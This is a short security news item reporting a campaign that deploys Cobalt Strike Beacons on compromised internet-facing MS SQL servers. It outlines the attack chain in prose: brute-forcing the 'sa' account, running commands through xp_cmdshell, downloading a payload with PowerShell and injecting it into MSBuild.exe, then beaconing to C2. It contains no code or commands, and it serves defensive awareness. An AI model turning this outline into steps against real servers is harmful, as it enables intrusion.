Cobalt Strike is being deployed on compromised internet-facing Microsoft SQL servers as part of a new campaign by threat actors, according to recently released research. MS SQL is a common target of attack for threat actors, as databases tend to hold sensitive information and credentials that the threat actor can use to further achieve their objectives.
The main compromise points threat actors use for internet-facing MS SQL servers are either exploiting an unpatched vulnerability within the MS SQL software or brute forcing the password for the “sa” account, which is the administrative account for MS SQL. Once the database software has been compromised, threat actors have been seen using the “xp_cmdshell” command to execute additional commands on the system. In this case, cmd.exe and powershell.exe were seen downloading a Cobalt Strike Beacon and injecting it into the normal Windows binary MSBuild.exe. Further injection is used by Cobalt Strike to inject its payload into the context of the WWanMM DLL, which is a normal Windows library used for the WWan Media Manager. From there, Cobalt Strike beacons out to its Command-and-Control (C2) server, awaiting commands from the threat actor.
While no post-exploitation activity was recorded, the threat actors likely use this initial compromise to gain a foothold on to the victim’s network, allowing them to move laterally within the environment to gain access to additional sensitive systems.